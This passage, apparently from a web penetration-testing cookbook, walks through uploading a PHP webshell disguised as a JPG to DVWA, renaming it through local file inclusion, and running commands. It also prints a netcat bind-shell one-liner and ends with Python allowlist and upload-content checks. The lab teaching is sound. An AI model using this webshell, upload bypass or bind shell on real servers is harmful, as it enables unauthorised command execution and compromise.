As we saw in Chapter 4, Finding Vulnerabilities, file inclusion vulnerabilities occur when developers use poorly validated input to generate file paths and use those paths to include source code files. Modern versions of server-side languages, such as PHP since 5.2.0, have by default disabled the ability to include remote files, so it has been less common to find an RFI since 2011.
In this recipe, we will first upload a couple of malicious files, one of them a webshell (a web page capable of executing system commands on the server), and then execute them using local file inclusion.
We will use Damn Vulnerable Web Application (DVWA) in the vulnerable_vm for this recipe and will have it with a medium level of security, so let's set it up at http://192.168.56.102/dvwa.
We will upload some files to the server, but we need to remember where they are stored in order to be able to call them again later; so, go to Upload in DVWA and upload any JPG image. If it is successful, it will say that the file was uploaded to ../../hackable/uploads/. Now we know the relative path where uploaded files are saved; that's enough for this recipe.
We also need to have our files ready; so let's create a new text file with the following content:
<? system($_GET['cmd']); echo '<form method="post" action="../../hackable/uploads/webshell.php"><input type="text" name="cmd"/></form>'; ?>
Save it as webshell.php. We will need another file: create rename.php and put the following code in it:
<? system('mv ../../hackable/uploads/webshell.jpg ../../hackable/uploads/webshell.php'); ?>
This file will take a specific image file (webshell.jpg) and rename it to webshell.php.
Next, try to upload webshell.php, as shown; the upload is rejected. So, there is a validation of what we can upload and what we can't. This means that we will need to upload an image file or, more precisely, a file with a .jpg, .gif, or .png extension. This is why we need the renamer script: to give the webshell back its original .php extension so that it can be executed.
cp rename.php rename.jpg
cp webshell.php webshell.jpg
Upload both webshell.jpg and rename.jpg through the Upload page. Then go to the File Inclusion section and exploit the vulnerability, including ../../hackable/uploads/rename.jpg. We don't get any output from the execution of this file, so we will need to assume that webshell.jpg is now named webshell.php.
Now include ../../hackable/uploads/webshell.php in the same way; let's try it. In the textbox, type /sbin/ifconfig and hit Enter. And it worked! As seen in the image, the server has the 192.168.56.102 IP address. Now we can execute commands on the server by typing them in the textbox or by setting a different value for the cmd parameter.
The first test that we did, uploading a valid JPG, was meant to discover the path where uploaded files are saved, so that we could use this path in rename.php and in the action field of the form.
It is necessary to use a rename script for two reasons: first, the upload page only allows JPG files, so our scripts need to have that extension; and second, we need to call our webshell with parameters (the commands to execute), and we cannot pass parameters when calling a JPG image from a web server.
The system() function of PHP is the core of the attack: it invokes a system command and displays its output. This allows us to rename the webshell file from .jpg to .php and to execute the commands we specify as GET parameters.
Once we upload and execute server-side code, there are many ways to further compromise the server; for example, the following command is what we call a bind shell:
nc -lp 12345 -e /bin/bash
It will open TCP port 12345 on the server and listen for a connection; when a connection arrives, it will execute /bin/bash, taking its input from and sending its output to the connected host (the attacking machine).
It is also possible to make the server download a malicious program, for example a privilege escalation exploit, and execute it to become a user with more privileges.
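The recipe chains two server-side weaknesses: an include() that accepts a traversed path, and an upload check that trusts the file extension. The following is an added example (not DVWA's code or the book's) of the two checks that would break that chain; the include directory, allowlist and sample bytes are constructed assumptions.

```python
import posixpath
import re

# Assumed values for the example; DVWA's real include directory and pages may differ.
INCLUDE_BASE = "/var/www/dvwa/vulnerabilities/fi"
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php"}

# Magic bytes of the image types the upload page accepts, and the PHP opening
# tags (including the recipe's short tag) that must never appear in an "image".
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
PHP_TAG = re.compile(rb"<\?(?:php|=)?|<script[^>]*language\s*=\s*[\"']?php", re.I)


def resolve_include(requested, base=INCLUDE_BASE):
    """Return (True, path) or (False, reason) for a user-supplied page name.

    The allowlist is the real control; canonicalising first means a traversal
    like ../../hackable/uploads/rename.jpg never reaches include()."""
    if requested.startswith("/") or "://" in requested:
        return False, "absolute path or URL rejected"
    resolved = posixpath.normpath(posixpath.join(base, requested))
    if posixpath.dirname(resolved) != base:
        return False, "path leaves the include directory"
    if posixpath.basename(resolved) not in ALLOWED_PAGES:
        return False, "page not on the allowlist"
    return True, resolved


def inspect_upload(filename, data):
    """Return the reasons to reject an upload; an empty list means it passes.

    Checking the extension alone is what lets rename.jpg and webshell.jpg
    through; checking the bytes catches PHP saved under an image extension.
    A genuine JPEG can contain '<?' by chance, so this is defence in depth:
    uploads still belong outside the web root, never where PHP executes."""
    reasons = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in {"jpg", "jpeg", "png", "gif"}:
        reasons.append("extension not allowed")
    if not data.startswith(IMAGE_MAGIC):
        reasons.append("content is not a JPG/PNG/GIF image")
    if PHP_TAG.search(data):
        reasons.append("embedded PHP tag")
    return reasons


# Constructed sample: the recipe's rename script as it would arrive as rename.jpg.
SAMPLE_RENAMER = b"<? system('mv webshell.jpg webshell.php'); ?>"
```

With these two checks in place, rename.jpg is refused at upload time and, even if it were stored, the include endpoint would not load it.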